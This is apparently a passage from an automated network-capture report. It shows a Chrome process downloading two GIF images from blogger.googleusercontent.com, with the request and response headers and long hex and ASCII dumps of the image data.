                                                                                                                            2024-10-06 11:50:15 UTC1390INData Raw: 66 19 94 85 e8 62 1d 96 1a 42 d7 af 96 d3 4c b6 db 69 49 de c9 09 48 01 37 51 48 00 15 13 72 7c bf 2e 35 99 33 c7 4b 39 fb af cf 99 ae d3 97 32 65 5f 46 77 0b 7e 58 b1 3d 4d 4b 69 72 be f3 93 ad d7 8b c5 be e9 e5 34 35 8f 2a d2 f5 5b 15 2c 3f 6e a5 7e 91 4e b9 52 f2 cb c9 79 05 c3 e2 99 82 ab 2d e4 ee 89 f2 03 94 99 0f 28 dd b3 06 74 b7 f4 99 41 71 cd 77 a4 d5 57 5d 13 45 67 ce b7 2b 15 aa ba da 8a 4a ea 2a 74 5d a9 58 4d 3a d9 ba 55 d3 56 f5 61 84 b4 86 90 da f8 0e ec a1 34 fc b9 a2 ae 41 bd 5f 4c da c9 b8 25 33 a8 12 2c 13 d2 c7 b5 7d 80 02 ea d8 28 9f 43 5e 53 5e 03 f8 98 e2 5b 88 76 f3 13 29 68 49 74 fe 93 67 2f 29 4a 74 4d 23 ab 2a 66 4c b5 cc 60 62 66 91 31 0d a6 5d 1b 18 a9 a8 f3 41 1d 0e 35 c6 43 32 d4 4a 9c 52 60 96 86 db 5b ea f3 d1 43 b6 a5 d6
                                                                                                                            Data Ascii: fbBLiIH7QHr|.53K92e_Fw~X=MKir45*[,?n~NRy-(tAqwW]Eg+J*t]XM:UVa4A_L%3,}(C^S^[v)hItg/)JtM#*fL`bf1]A5C2JR`[C
                                                                                                                            2024-10-06 11:50:15 UTC1390INData Raw: 14 74 54 8e 30 d5 2b ab b8 dc 69 c3 3e 43 67 cb 16 bb 8f 45 56 4c c7 52 cf 9f 33 0e 59 cb 9d 20 3f 62 c9 21 d5 b2 fd 4b 8d e7 ca 85 de f3 3d 63 1f 24 f5 7d b7 2a d0 d4 b7 58 2d 34 0f aa be ba b5 8a 85 55 34 dd ae db 56 a7 78 4b 93 b4 8f 0e d3 56 2a 39 9e 7d e6 f5 63 97 cd ca ff 00 43 b5 4e 52 d4 25 04 e5 69 51 55 6b 8f 4c 5a 66 51 a2 66 fc 54 04 86 4b 07 28 72 16 16 20 b3 1a f8 72 35 99 8c 3a e1 1f 75 28 75 d4 66 3c dc e1 a7 27 e0 f8 7c 6b 89 4e 1f 33 42 a8 af a8 88 4a f9 ac b4 aa e4 35 ed 33 0d 48 d5 f4 b5 43 1b 00 d4 ce 57 18 ec 24 b6 3a 65 0d 15 2d 98 30 16 84 29 d5 42 f3 08 21 87 5c 74 82 8c a7 47 64 d6 52 64 c7 08 79 5f c4 dc f7 25 97 c4 4d 61 9a d5 44 e2 57 03 26 aa 1d 9d c4 d0 d4 13 32 45 4c 25 c1 9a 8e 49 29 4a dd 9c 45 cc 22 95 cf 87 44 74 64 1b
                                                                                                                            Data Ascii: tT0+i>CgEVLR3Y ?b!K=c$}*X-4U4VxKV*9}cCNR%iQUkLZfQfTK(r r5:u(uf<'|kN3BJ53HCW$:e-0)B!\tGdRdy_%MaDW&2EL%I)JE"Dtd


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            77192.168.2.649817142.250.185.1934436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:14 UTC669OUTGET /img/b/R29vZ2xl/AVvXsEjj8Fs3JMUwF85O07XgsV-e1rmQjTwS91jcu-zh3Lr_fEgVfhY823rmnMewtU59iGvsFjcBm-12OLSj81f57ZEksJeU2GaG7UU3zuwDsOsfTO4dAJ693JJyILcXjdHEzirw-pPBCeV1CfTqSroNgoMTGIfy-Y-HC8GAJDmo68GYd1-x2gGu0UsincrU/s16000/ezgif.com-crop%20(5).gif HTTP/1.1
                                                                                                                            Host: blogger.googleusercontent.com
                                                                                                                            Connection: keep-alive
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            Accept: */*
                                                                                                                            X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEIucrNARjrjaUX
                                                                                                                            Sec-Fetch-Site: none
                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            2024-10-06 11:50:15 UTC480INHTTP/1.1 200 OK
                                                                                                                            Content-Type: image/gif
                                                                                                                            Vary: Origin
                                                                                                                            Access-Control-Expose-Headers: Content-Length
                                                                                                                            ETag: "v73d"
                                                                                                                            Expires: Mon, 07 Oct 2024 11:50:15 GMT
                                                                                                                            Cache-Control: public, max-age=86400, no-transform
                                                                                                                            Content-Disposition: inline;filename="ezgif.com-crop (5).gif"
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:15 GMT
                                                                                                                            Server: fife
                                                                                                                            Content-Length: 1188349
                                                                                                                            X-XSS-Protection: 0
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                            Connection: close
                                                                                                                            2024-10-06 11:50:15 UTC910INData Raw: 47 49 46 38 39 61 57 02 b0 03 f7 00 00 00 7e dd 00 83 e8 02 9f c1 04 89 ef 04 91 f9 05 50 89 05 69 b6 06 65 aa 06 66 b0 06 78 ce 06 8d f2 06 8f f3 09 84 dd 09 87 e5 09 89 ea 09 8c ed 0b 8b ec 0b 90 f1 0c 8b e8 0c 8d e9 0d 8b e6 0d 8b e8 0d 8f ec 0e 8b e8 0f 8b e7 0f 8b ea 0f 8c e8 0f 8c e9 10 6d b2 10 82 d5 10 86 dc 10 88 e0 10 8a e3 10 8a e5 10 8b e5 10 a6 dc 11 7e cf 11 8b e5 11 8e e0 12 91 ee 13 8a e8 16 88 de 17 83 d3 17 9d f9 1b c9 ce 1e 6f aa 1e 7c c3 1e 93 eb 21 4c 6d 22 d3 d5 23 86 d1 23 d0 d5 23 d2 d2 23 db dc 24 6c a2 24 d1 d4 25 d1 d3 25 d2 d4 26 77 b4 26 d1 d3 27 82 c5 27 a3 f9 27 d1 d4 27 e3 e5 28 c0 f4 28 d0 d1 28 d0 d4 28 d1 d1 28 d2 d4 28 e3 e3 29 c9 d3 29 d1 d3 29 e1 e6 29 e2 e4 2b dd e9 2c 91 db 2c e1 e2 2e ce cd 2e e5 e6 30 c4 d1 31 e9
                                                                                                                            Data Ascii: GIF89aW~Piefxm~o|!Lm"####$l$%%&w&''''(((((())))+,,..01
                                                                                                                            2024-10-06 11:50:15 UTC1390INData Raw: 30 63 1e 1c 39 f2 c2 85 95 1a 58 c2 dc 68 b1 24 c7 0d 39 57 ca 1c fa f0 61 c1 a0 29 93 76 2c 8a 90 e6 84 a1 50 a3 4a 9d 4a b5 aa 55 ab 13 2b fe 84 99 35 eb c8 a1 4e c3 3e dd 60 f2 60 d0 b3 3a af aa 5d eb 52 ec 47 9b 38 d3 ba f4 59 72 20 d2 9c 6c 19 1a 25 88 36 e8 52 86 21 f3 0a 1e 4c b8 b0 e1 85 7b c9 4a a4 28 b3 2b c5 af 32 dd d2 84 a8 11 21 da 94 72 0f 6b a6 2a 19 2e 66 bc 3b e9 5e b4 9b 13 f3 e6 81 89 05 de f5 8b 31 f5 4c 90 a7 63 cb 9e 4d bb 20 0a 9b 02 bb 72 04 dd d2 f1 06 c8 31 25 43 2e cb 1b 68 52 a1 b5 93 7b 74 7b 57 69 68 d1 a3 9b cb 76 dd 1c 65 d5 c0 ca b3 6b df 0e d5 28 4f 08 a3 5f fa ff 06 0e 53 b8 48 d1 27 d1 72 5f 5f 50 b2 6a f5 cf a1 bf 3f 3b dd 32 fc 86 ae 0d 62 67 cf bf bf ff 81 65 c5 e4 5b 6d 01 1e d5 57 66 ff 19 76 20 82 06 c1 75 5f 42
                                                                                                                            Data Ascii: 0c9Xh$9Wa)v,PJJU+5N>``:]RG8Yr l%6R!L{J(+2!rk*.f;^1LcM r1%C.hR{t{Wihvek(O_SH'r__Pj?;2bge[mWfv u_B
                                                                                                                            2024-10-06 11:50:15 UTC1390INData Raw: 38 9b 89 58 ef 05 29 f0 c0 17 06 61 09 5d c8 82 a6 30 65 06 34 62 5a d3 7b e6 b4 9e ed 84 06 34 40 91 88 1e a0 e0 23 13 24 4b 53 29 e3 22 a6 a6 71 23 09 8d 22 06 a2 78 1b 0c e0 06 62 0c e5 ec f5 36 bb 59 51 d9 a4 6a 10 43 cc ed fc 14 51 db 4d b4 4a d8 c4 68 6b 3f b7 af 70 ff 21 2b 84 23 2d a3 07 91 65 51 b3 dd 76 9a b9 6d a3 5c 38 4a 95 9c 44 24 7b 4b 48 c1 1c 22 e1 57 77 36 83 a6 31 8d e9 3d 0d 9b 53 69 f0 34 18 d0 e8 05 2f 16 01 86 07 2c 60 82 29 b0 60 04 b7 a5 54 ba b8 8a 2e 99 3d 01 0a 42 d0 80 28 aa b7 83 71 c5 de 7a 45 6b 3d d3 2a c4 02 1b 38 81 40 2a 70 10 66 7d 10 84 28 6c ab 4c 3c ca 5a d9 b2 70 85 08 22 ae b7 6c 85 d6 67 0e 29 27 44 25 aa f1 d4 e5 b6 12 7e 32 7d 6a e9 5b 09 40 b0 04 33 84 c2 14 82 9d 69 34 82 51 cf e8 32 23 18 d6 ad e9 4c 7b 31
                                                                                                                            Data Ascii: 8X)a]0e4bZ{4@#$KS)"q#"xb6YQjCQMJhk?p!+#-eQvm\8JD${KH"Ww61=Si4/,`)`T.=B(qzEk=*8@*pf}(lL<Zp"lg)'D%~2}j[@3i4Q2#L{1
                                                                                                                            2024-10-06 11:50:15 UTC1390INData Raw: 70 08 6a 10 05 c9 a5 03 53 e0 06 86 d0 0a b2 00 6e bd c0 0c d2 d0 0a 65 40 88 29 d0 86 41 76 02 9c a0 7e ec d4 0b 7f 36 62 c2 14 0c 9f 00 07 1d c0 6a 29 80 82 1e 60 3d 8d 36 07 a0 70 4f bc d0 7e 61 f9 52 d1 20 0a f1 47 88 9f 86 43 ea 85 74 6e 10 09 32 45 62 42 29 0d cf f0 0c c1 a0 09 4b a0 02 d7 73 44 27 c0 12 84 68 06 8b f0 4e c0 00 73 ef 14 98 b1 a0 09 2b 60 02 75 96 5f 11 64 01 ff 35 92 91 51 92 e9 e2 99 15 a5 92 a2 a9 83 bc 13 52 8f 34 84 9a 61 9a 57 21 02 20 a0 00 2b f0 61 bc 20 0d ea c7 4b b5 40 0b 04 79 9b f2 c4 62 b1 40 09 7d 00 07 51 c0 03 f1 67 3d 32 a0 02 f1 e7 06 a6 e0 4e 4d 28 68 99 60 95 d6 93 95 5b f9 4e b5 f0 88 2f f5 52 f0 34 53 a9 50 05 57 c0 6a 16 20 01 26 d0 01 27 90 88 40 f0 09 ba ff 04 8e ed 24 4c ed 37 4f 7b 90 05 98 78 52 38 14 88
                                                                                                                            Data Ascii: pjSne@)Av~6bj)`=6pO~aR GCtn2EbB)KsD'hNs+`u_d5QR4aW! +a K@yb@}Qg=2NM(h`[N/R4SPWj &'@$L7O{xR8
                                                                                                                            2024-10-06 11:50:15 UTC1390INData Raw: de 15 01 2a f0 05 ad 10 95 cd b0 c6 41 86 02 7d ec c5 87 f7 09 68 80 cd a0 97 88 11 00 04 85 07 0d c5 5c 67 7f fc 3d 7f 93 23 f8 21 57 04 51 30 ce c7 c0 92 0b aa 21 1b 92 df f4 60 26 28 61 08 72 a1 3e 58 d0 1e 37 b2 c6 72 b7 a1 6c ce 91 09 0d a7 fb 11 76 79 57 27 98 7b de 83 7b 48 a5 5e 34 0c 0d 87 25 0d 23 d6 08 53 30 00 d9 9c ce bb cc 0c bd ac 00 09 65 80 3c 80 05 55 7a 9f 60 ff c0 c4 1b 69 02 c0 07 c5 d2 50 09 65 d0 5e a4 f7 4f 01 00 04 bc 20 a4 cc 90 c5 41 86 7a ac 26 9e bb 04 09 65 90 be 7d a3 00 66 4c ce 2c 2a 0d 5f e0 02 48 1b cf 4f ac 4b d0 10 09 5d 10 00 48 3b 7b 03 60 c5 fd 0b 0c 6a 30 05 e9 96 cf a6 23 25 93 a5 5a ef 93 3b 01 1d a2 03 ad 4a 0e cd 38 d2 57 3c 0b 6d b1 eb 62 5b 0f 1d 15 13 21 c2 03 e0 a3 60 89 9c a4 ac c2 16 00 80 75 3c 72 1a 60
                                                                                                                            Data Ascii: *A}h\g=#!WQ0!`&(ar>X7rlvyW'{{H^4%#S0e<Uz`iPe^O Az&e}fL,*_HOK]H;{`j0#%Z;J8W<mb[!`u<r`
                                                                                                                            2024-10-06 11:50:15 UTC1390INData Raw: 2f af b4 32 eb 93 65 00 0a d8 28 32 7c 92 f5 b5 52 ff 96 15 04 32 4c e0 9d e2 4b 2b 5d d0 90 99 21 b1 10 b6 02 ac af a0 31 ab d4 25 81 00 d3 0c 18 a0 e6 15 ac 99 40 82 04 4a 7c a0 c0 fb 21 46 8c 1c 33 80 17 5f 5e a3 c7 9e e9 43 46 65 df 9e e5 d3 97 3d 71 da 44 29 9f 27 7d f7 f9 f5 bf 84 2f 14 e9 7e ff 2a 02 10 a8 a9 36 98 68 ac 44 3a 63 a6 ae e5 64 e1 c4 0c 2c 30 8b 80 80 1e 7a f8 a2 0e 48 40 51 8d 97 ae f8 0a 66 39 68 a0 79 e5 15 bd a0 f9 90 19 5e 1e 81 ad aa c2 54 e9 85 17 18 15 ab 0e 99 60 5e 44 a4 0c 19 96 80 00 02 14 4a 90 90 80 4a 3a fb ac 8c 17 4c c8 ed 85 13 4c e0 62 c4 c4 f0 d0 02 85 d7 50 a8 8a b6 af 20 c9 e2 84 08 76 e3 4d 85 df 64 11 8e 0b 15 76 44 e1 85 01 92 7b 06 9a 4a d0 b0 e0 2c 36 51 f8 82 17 64 a2 61 86 8d ec 4a 40 48 21 86 1c 02 6f 22
                                                                                                                            Data Ascii: /2e(2|R2LK+]!1%@J|!F3_^CFe=qD)'}/~*6hD:cd,0zH@Qf9hy^T`^DJJ:LLbP vMdvD{J,6QdaJ@H!o"
                                                                                                                            2024-10-06 11:50:15 UTC1390INData Raw: 51 98 8b 3b 70 1a ca 4e 05 11 44 29 e8 e7 b4 5f 01 eb 68 71 2a 68 79 ad 73 3f 7f 06 a7 19 a1 28 03 0a 25 00 30 74 95 80 02 a3 b4 40 60 90 45 41 d6 8a 89 a3 07 dc e8 cc 7c e8 90 09 68 e0 a6 46 54 58 35 79 23 81 e3 10 e6 04 1f c0 2f 6c 64 89 99 53 f9 68 b3 01 ce d2 2c 03 b3 4b 0a 3c 40 c3 0f b0 93 25 3d 09 3a 77 51 16 36 0e 68 5d 52 61 b7 cd 94 54 d7 8d d8 6d ee ed 74 a7 dc a8 4c 35 bb 30 a6 f1 ee ea a8 ce 13 b3 d3 8e 72 7c 5d ce e6 79 b2 77 7e 0c 04 e5 52 00 0f da d0 0a 59 d4 45 5a fe ff 1c 64 30 f6 b2 17 f3 16 b4 17 5c 49 cc 5c a0 41 0b 36 44 61 05 0c 99 c0 0c 51 d0 9d 54 22 76 22 55 e1 68 45 64 d3 ce 12 2c 24 02 0f 40 e6 7b bb 03 9b 7b bd 59 30 68 09 e1 52 28 a2 d2 d8 46 60 01 12 be af 43 34 9c 25 64 22 2b 95 13 90 00 65 79 23 82 10 2c f6 05 1e a0 a6 bb
                                                                                                                            Data Ascii: Q;pND)_hq*hys?(%0t@`EA|hFTX5y#/ldSh,K<@%=:wQ6h]RaTmtL50r|]yw~RYEZd0\I\A6DaQT"v"UhEd,$@{{Y0hR(F`C4%d"+ey#,
                                                                                                                            2024-10-06 11:50:15 UTC1390INData Raw: f8 c8 a7 14 43 d1 c4 31 34 5a c2 dd 52 c1 bd 6b ba 99 2c b8 9a bc 09 ad cb c9 83 db 49 0b e8 c9 cb 84 48 80 ab cd a8 b3 c8 ed 23 c7 cb d3 0f dd dc 9d 2e 6c 94 ff 9d 1b 94 e1 bc 4d 81 db ad c6 7c 4d 96 d8 37 e5 ec c8 cd c4 19 87 c4 cd 15 d3 34 e9 f4 37 84 24 bf b1 44 4d d0 1b cb 70 ea 4a 68 ac ce 46 5c 2a 68 13 4b a0 60 4e 4f b4 ae 69 04 4f f5 9c 4c a8 83 c5 14 fc bc 01 69 4f 72 f2 4e 94 5b cf d3 dc a8 52 93 cf 95 30 cf eb 44 c1 f3 5c 4f 00 15 ca fe 94 89 ff 2c b5 ae 13 4c ee 24 27 f2 a8 09 f0 44 ce 02 fc 09 fe 64 c1 a5 1c d0 00 ad 50 70 94 50 2f cc 4e f8 dc c7 04 0d a7 05 b5 cf dd f2 3c 55 2c cf d7 69 ce 09 c5 50 0b 4d 51 f1 a3 d0 f0 ec d0 15 74 d1 de f9 50 f5 bc 4f 68 63 8a eb 8c 50 18 4d 48 8d 50 49 15 ed 51 cc 24 ca c0 34 4a 39 0c 4c f7 f8 cd ab cc 51
                                                                                                                            Data Ascii: C14ZRk,IH#.lM|M747$DMpJhF\*hK`NOiOLiOrN[R0D\O,L$'DdPpP/N<U,iPMQtPOhcPMHPIQ$4J9LQ
                                                                                                                            2024-10-06 11:50:15 UTC1390INData Raw: 69 9d 56 1e 4a 9d c6 df f5 dc 8a b6 64 77 85 56 76 25 69 a3 f6 d7 87 26 e8 24 06 4d 3a 1e e5 9f 3e 6a a8 ae d5 6b 8e e6 6c 6e c3 6d 8e 6a ac 36 54 fd 64 d8 f0 25 59 85 cd 6a b0 8e d2 a9 46 b8 ab 0e 6b b3 ee d1 b1 f6 bc aa 2e d2 b2 3e 6b b7 0e d0 b4 1e cf b5 6e ea b7 ae eb 71 ed 64 68 de 3a 35 ec 59 7f b6 6b bf b6 50 bc 06 6a 1e 96 68 d1 75 63 de fd 6b c4 9e 51 c6 3d e1 8d fe dc eb f9 5b 84 7e 5a 4c 66 ec c4 ae ec b5 4c ea c6 1e 19 d9 15 6a f4 c4 67 52 b6 6c d0 16 56 67 75 5c a2 26 e5 69 f5 4f a8 15 e9 d0 5e 6d d6 ad dd 51 79 5e 38 d6 5f 39 7d ec 2f 4e e4 96 98 5f 8e f6 d2 85 66 6d de be 50 ff ce 45 49 d2 2e e4 3c 3e 68 90 e6 89 dc 81 db de 4e 6e 50 45 54 84 0d ea 33 8e 68 e5 8e ee 15 dd e6 7d 95 66 6d c6 61 e9 ce ee a8 c2 6d fd b5 cd bc 56 6b 43 e1 6e e4
                                                                                                                            Data Ascii: iVJdwVv%i&$M:>jklnmj6Td%YjFk.>knqdh:5YkPjhuckQ=[~ZLfLjgRlVgu\&iO^mQy^8_9}/N_fmPEI.<>hNnPET3h}fmamVkCn
                                                                                                                            2024-10-06 11:50:15 UTC1390INData Raw: 7c b2 f9 07 21 88 21 8a 38 22 49 12 ce 66 df 40 15 6a 57 02 8b 25 64 68 20 87 4b 79 f8 1c 7a 24 da 78 23 8e 37 9a 98 9c 41 2a 86 e6 a2 8b 2f be 17 23 43 03 12 98 23 92 49 2a 89 df 8e 35 a6 b7 23 65 09 ce e8 e4 92 55 5a 79 25 6b e4 55 e4 63 4f 5a 62 f9 25 98 61 a6 e6 ff e5 44 5c 0a d4 54 94 1d 8a b9 26 9b 6d 6a 45 e6 41 a6 a9 e9 13 9c 6e da 79 27 9e 25 4a 99 91 99 93 39 e5 d8 9e 79 0a 3a e8 65 8b 19 ea 57 5e 88 b6 75 e8 59 89 32 fa 28 a4 91 4a 3a 29 a5 95 5a 7a a9 5f fb d5 09 51 9f 3a 6d 4a 28 a8 a1 86 da e4 91 cd 05 6a a4 41 1a 12 19 27 8f a2 ba fa 2a 49 75 c9 3a 2b ad b5 da 7a 2b ae b9 ea aa 6b 06 12 40 90 81 ad 14 08 3b ac b0 b4 f6 fa 6b af 74 7d f5 16 7b 72 79 45 97 04 d1 4a ab ec 05 bb ce 7a 2c b0 b5 12 4b ac b5 dd 7a fb 2d b8 e1 8a 3b 2e b9 e5 9a 7b
                                                                                                                            Data Ascii: |!!8"If@jW%dh Kyz$x#7A*/#C#I*5#eUZy%kUcOZb%aD\T&mjEAny'%J9y:eW^uY2(J:)Zz_Q:mJ(jA'*Iu:+z+k@;kt}{ryEJz,Kz-;.{


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            78192.168.2.649816142.250.185.1934436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:14 UTC669OUTGET /img/b/R29vZ2xl/AVvXsEilUMIG_IMFVixTFpWb4xA5f1HJt25lbv-cc1baknB_YJeWO9FYU4SJOzdeMNkA1msFpUU-0MiI3B-llmFX122-XhqCq7-1HW4YUfaWX52rlNtfspDDvlFNj_A--xZIRknP3ycDkzm51noxYaFx_gfOck3U745QZSBwpCSesqOq1oEycuQamqaZlqoz/s16000/ezgif.com-crop%20(3).gif HTTP/1.1
                                                                                                                            Host: blogger.googleusercontent.com
                                                                                                                            Connection: keep-alive
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            Accept: */*
                                                                                                                            X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEIucrNARjrjaUX
                                                                                                                            Sec-Fetch-Site: none
                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            2024-10-06 11:50:15 UTC480INHTTP/1.1 200 OK
                                                                                                                            Content-Type: image/gif
                                                                                                                            Vary: Origin
                                                                                                                            Access-Control-Expose-Headers: Content-Length
                                                                                                                            ETag: "v73d"
                                                                                                                            Expires: Mon, 07 Oct 2024 11:50:15 GMT
                                                                                                                            Cache-Control: public, max-age=86400, no-transform
                                                                                                                            Content-Disposition: inline;filename="ezgif.com-crop (3).gif"
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:15 GMT
                                                                                                                            Server: fife
                                                                                                                            Content-Length: 1386608
                                                                                                                            X-XSS-Protection: 0
                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                            Connection: close
                                                                                                                            2024-10-06 11:50:15 UTC910INData Raw: 47 49 46 38 39 61 57 02 b0 03 f7 00 00 01 7d da 03 84 e5 03 8a f0 05 6b b9 05 8e f4 07 92 f8 08 8b ec 08 90 f4 09 81 d8 0a 85 df 0a 8d ed 0a 94 f8 0c 8b ea 0d 89 e6 0d 8b e6 0d 8b e8 0e 8b e8 0e 8c e8 0e 8c eb 0f 8c e9 10 8b e7 10 8c e5 11 89 e2 11 99 fb 12 8d e8 13 8f eb 18 86 d8 18 8a de 1a 7d c7 1b 8e e1 1b 94 e9 1e 6f aa 1e 97 eb 20 83 cc 22 75 b2 24 9e f7 26 73 a7 26 9d ec 2b aa fc 2d 85 ca 2f 72 9c 2f 7d b7 30 9d e8 31 a3 ed 33 96 df 35 90 d1 39 ac ee 3c 72 8d 3d 81 b5 3d ac f7 3e 79 9e 40 b7 f9 41 ab ee 48 78 91 49 7e a6 4a af f7 4a ba f6 4e 9a cd 4e b8 ef 4f a3 df 4f bd f4 54 b7 f8 54 c3 f4 55 ab e8 57 94 b8 58 84 a9 59 78 89 59 7e 99 5b b8 f8 5b c1 f4 5d c7 f4 60 bd fa 61 cc f6 65 aa de 66 a1 cd 66 bf f9 69 b2 e9 69 cf f9 6b c7 fa 6c c2 f9 6c d9
                                                                                                                            Data Ascii: GIF89aW}k}o "u$&s&+-/r/}01359<r==>y@AHxI~JJNNOOTTUWXYxY~[[]`aeffiikll
                                                                                                                            2024-10-06 11:50:15 UTC1390INData Raw: 06 5f 56 80 d9 12 e3 ca 9a 03 1f 46 3c 89 b3 a7 cf 9f 40 83 6a 5c 29 b1 a4 d0 a3 48 93 2a 15 79 f2 65 84 9b 42 a1 d6 74 1a d3 69 84 a5 02 a5 2a 25 ca 12 ab d7 af 60 7b ae a4 1a b6 ac d9 b3 0d 69 8e 7d a9 f5 67 db 90 64 5d 56 9c 69 74 e9 db a3 77 d1 ea dd 0b 54 27 42 ae 75 f9 0a 1e 8c 15 30 5b 9e 51 11 4f 7d 59 35 ee 56 c5 35 fd 1e e4 4a b8 b2 65 9f 79 2f 6b de cc b9 b3 40 ab 57 3d a7 cc 5c 10 b4 e8 d3 48 25 1b 24 8d ba b5 eb d7 b0 c3 aa 2e c8 7a 60 85 db b8 69 c6 de dd 71 36 c1 da bc 83 0b 1f 4e dc a0 ef 81 c0 27 e0 ce 1d ba b8 f3 a1 90 9f 4b 9f 4e 3d 78 72 d3 d5 9d 1f cf 1a 3d bb f7 ef e0 bd 6e ff 9f 70 9d 71 f8 e1 e3 b5 ea 3e cf be bd 7b 8d e9 21 af 97 bb 7c fe fb d3 f1 47 de df cf bf 7f c1 fc 13 61 e4 98 7f d6 75 87 1d 81 08 26 48 dd 5b a0 1d a8 e0 6b
                                                                                                                            Data Ascii: _VF<@j\)H*yeBti*%`{i}gd]VitwT'Bu0[QO}Y5V5Jey/k@W=\H%$.z`iq6N'KN=xr=npq>{!|Gau&H[k
                                                                                                                            2024-10-06 11:50:15 UTC1390INData Raw: c2 4d 1d a6 0e 41 26 6c 40 45 14 60 82 46 5c e2 6d 09 b4 22 4c 67 4a 53 2b 1a af 13 81 b5 db 27 24 71 87 13 84 60 53 dc 61 e8 0d 7c 70 04 ca 52 f6 08 38 58 81 39 0d b6 29 33 12 ec 36 07 93 00 20 d1 a4 02 17 dc e0 06 34 50 01 08 36 10 80 1a 31 40 27 2a ec a3 42 5f 94 81 15 ff c4 e0 b4 31 50 6d 07 58 d2 54 3f 4d 80 50 65 dd eb 03 d4 b5 81 18 f4 a0 07 37 50 41 07 b0 65 a8 25 e6 d0 56 75 75 d0 5c 71 c2 b8 35 ad a8 01 2f aa 00 12 24 71 89 b5 95 92 13 02 cc a2 2a 55 a9 40 91 25 4f 64 9f 90 db db 38 a1 89 1d 88 a0 03 55 1b eb 01 16 10 08 48 48 02 13 53 4c 20 24 f0 26 87 18 6c 20 55 02 20 c0 f5 a2 f4 94 04 74 20 54 25 f0 01 1e 0e 61 5f a7 91 e1 07 fc b2 66 a1 ae ca d0 64 12 40 00 20 30 82 1c fa 70 89 4b 30 c2 10 70 48 02 08 2c a0 01 0d dc 52 42 b7 dc 54 f8 1c 60
                                                                                                                            Data Ascii: MA&l@E`F\m"LgJS+'$q`Sa|pR8X9)36 4P61@'*B_1PmXT?MPe7PAe%Vuu\q5/$q*U@%Od8UHHSL $&l U t T%a_fd@ 0pK0pH,RBT`
                                                                                                                            2024-10-06 11:50:15 UTC1390INData Raw: 54 94 3c 32 44 44 f4 24 96 74 44 46 d9 94 25 22 23 4c 65 01 de f8 06 5d a6 4e 0b b4 09 6a 20 03 4d c4 50 04 00 33 d3 92 42 da c3 54 0a b3 2e 2d 10 8f 74 33 4f 9f c0 05 5a c9 00 0a 75 00 a6 e7 68 6b 30 04 a9 82 74 19 10 02 50 70 3c 91 e0 8c 73 c6 59 0c 09 37 78 00 04 61 e6 4c 19 d0 00 33 50 7d 9e 60 05 5a d9 47 bb 75 00 58 b6 36 72 00 03 a6 62 69 06 c0 00 08 30 03 d4 b7 09 9d 10 03 1c b0 00 12 40 35 ec 72 07 c2 18 08 43 00 33 64 24 48 33 90 40 8e a6 04 29 50 2d 75 e4 94 ae 79 24 48 59 49 1f 72 49 af 59 25 ec 51 5d d2 75 1f 2b f2 00 0c e0 8d 7a 70 40 80 75 95 59 d9 44 01 07 01 ea 18 6e 17 a4 24 02 b1 2e e8 c4 36 74 83 53 58 99 02 d4 52 3a c9 74 6d af 94 06 35 80 2a 74 94 01 1c f0 03 76 63 37 37 c0 01 4d ff b4 4b 9b c2 90 9e d0 09 78 60 03 e6 c4 44 28 24 00
                                                                                                                            Data Ascii: T<2DD$tDF%"#Le]Nj MP3BT.-t3OZuhk0tPp<sY7xaL3P}`ZGuX6rbi0@5rC3d$H3@)P-uy$HYIrIY%Q]u+zp@uYDn$.6tSXR:tm5*tvc77MKx`D($
                                                                                                                            2024-10-06 11:50:15 UTC1390INData Raw: c1 ea 92 8a ec c2 72 f0 02 08 c0 01 08 90 ce 09 30 00 a7 79 95 70 8a a5 96 96 c9 14 f7 c9 e0 da c9 8f 01 ca 5e c2 27 16 93 06 5a 96 5e 98 c0 36 8c 80 07 38 30 02 17 70 00 0d 3c 02 3d 70 05 72 c0 60 8c d0 61 51 d6 45 1d 16 63 5d 54 4a 77 53 06 d0 3b 11 37 ea c5 d9 86 6b 8d 27 bc 96 90 06 41 c0 02 1b c0 44 7f b3 29 6f f0 b0 f9 c9 9e f5 89 7f 9e 46 ab b6 7a 68 da fc 98 01 36 60 c3 ff 52 c8 d4 5b b2 16 70 b2 0f 2b 07 43 10 3e 00 5b 00 0e 50 98 98 10 a1 d4 2a 60 1b f0 5b cf 25 27 e9 6b cf 19 81 2b 14 27 95 02 a0 04 31 4b bc e0 45 3c 87 80 07 60 00 05 5a fd 06 f1 42 4a 8b 0b 58 4a b6 64 71 8b 5f 6f 43 3c 00 94 07 3d 6d 4d 18 9d 01 89 b0 40 f4 44 40 45 9b 08 61 00 03 27 60 4e 2b 52 56 87 c2 47 c1 bb 09 14 5c 6e 7b d8 01 02 30 03 de 97 5e c9 3b 12 1b 20 a5 9f b6
